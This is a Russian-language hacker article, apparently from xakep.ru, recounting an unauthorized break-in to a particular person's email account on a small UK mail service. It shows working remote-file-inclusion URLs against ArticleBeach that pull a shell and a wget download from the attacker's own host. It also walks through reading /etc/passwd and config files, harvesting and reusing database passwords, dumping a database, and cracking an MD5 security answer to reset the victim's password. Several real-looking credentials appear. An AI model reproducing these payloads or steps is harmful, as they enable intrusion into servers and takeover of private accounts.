special

Взлом мыла и почтовика

 

Так повелось, что я никогда не брался за взлом мыл. Но тут поступило заманчивое предложение
от одного знакомого, которому позарез нужен был доступ к одному мылу.
Само мыло располагалось на небольшом почтовике *.co.uk.
Знакомый пробовал брутить мыло, но результата это не принесло и он обратился к мне.
Сперва я простмотрел сам почтовик. Кроме окошка ввода логина/пароля все сплошной html.
Попробовал форму ввода пароля на Sql-инъекцию, но ковычки фильтровались.
Server: Apache/1.3.34 (Unix) PHP/5.0.5 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.7a
Окрытые порты с сервисами тоже не радовали.

Решил проверить, не хостится ли тут еще кто-то. Оказалось по данному ip числится еще несколько десятков сайтов.
Прошелся по ним, единственный phpBB оказался патченным, поэтому ни один из эксплойтов не сработал.
И тут я наткнулся на продукт ArticleBeach www.articlebeach.com.
Первый же запрос:
http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=ls%20-lpa
выдал мне список файлов сервера. Зря програмисты ArticleBeach ели свой хлеб с маслом.
полазив по сайту я нашел еще одни баг, добродушно оставленный разработчиками ArticleBeach,
в директории /includes/ любой юзер может просмотреть файл config.inc следующего содержания:
Пример файла взят с сайта девелоперов ArticleBeach http://www.articlebeach.com/includes/config.inc
<?
global $_cn;
global $dbserver;
global $db;
global $dbuser;
global $dbpass;

//mysql database server,login,password & Database name
$dbserver ="localhost";
$database_connect="article_art";
$dbuser ="article_jer";
$dbpass ="aaaaa";

$connect = mysql_connect($dbserver, $dbuser, $dbpass)
or die("Couldn't connect to MySQL");
mysql_select_db($database_connect, $connect);


?>

Как вы уже поняли это реквизиты доступа к базе данных сервера.
К сожаленю в моем случае пароль на базу данных не подошел к фтп,
чего нескажешь о других сайтах, где стоит продукт от ArticleBeach.
Пришлось ковырять сервер через внешнюю инклуду.
Открыв /etc/passwd я не смог обнаружить имя нужного мне почтовика,
логины юзеров и доменные имена сайтов несовпадали.
Зато была возможность просматривать web-директории пользователей: /home/*/public_html/
Уже хотел было начать тупо перебирать всех по списку, но решил проверить файл accounting.log,
в котором хранятся логины и доменные имена на cpanel. И точно я получил список доменных имен.
Выбрал нужный и стал изучать веб-директорию. Быстро нашел в исходниках реквизиты доступа к БД MySQL:
'database' => '***_themail', // Name of your MySQL database
'username' => '***_postman', // The username and password that
'password' => 'jkretj3h45j'
Пароль опять не подошел к фтп.

Осталось только прицепится к БД. Надо было искать доступную на запись директорию или файл.
И опять спасибо разработчикам ArticleBeach которые позаботились в своем продукте о директории /backup/ с правами drwxrwxrwx.
http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=wget -O backup/sql.php http://durito.narod.ru/sql.php
и фиг, то же самое с GET, links, fetch, lynx. Позже я узнал, что запуск wget и GET запрещался PHP Secure, links, fetch и lynx отсутсвовали.
Продолжил внутренний осмотр сайтов хостера. Навыуживал еще несколько паролей к БД, но к фтп они опять не подошли, все пароли представляли собой многосимвольную абракадабру.
И вдруг тайваньский сайт, интуиция подсказала проверить его и вот оно - пароль доступа к БД - anahol !!! Конект к фтп, пасс проходит и скрипт для работы с БД от rst.void.ru залит.

Конект к базе, нахожу нужную таблицу и дамплю ее. А вот и заветное мыло, пароль правда зашифрован MD5,
но это дело поправимое, правда долгое и муторное. Но для начала я решил проверить хеш на http://md5.rednoize.com/, но пасс
не был найден, и я уже приготовился было к долгому перебору, но тут заметил, что и ответ на секретный вопрос тоже закодирован в MD5.


Пробиваю на md5.rednoize.com секретный вопрос и вот он: Cheung !!!


Захожу не почтовик и отвечаю на секретный вопрос. Мне предлагают ввести новый пароль и его подтвердить. Шах и мат!
И мой приятель получает доступ к заветному мылу, незабыв мне выкатить пива. А я удаляюсь его жадно поглощать.

опубликована на www.xakep.ru

Твой bug Durito.
_________________
EAT THE RICH!

 

  Created 1996-2005 by durito. Copyright 2006 by durito
All Rights Reserved


';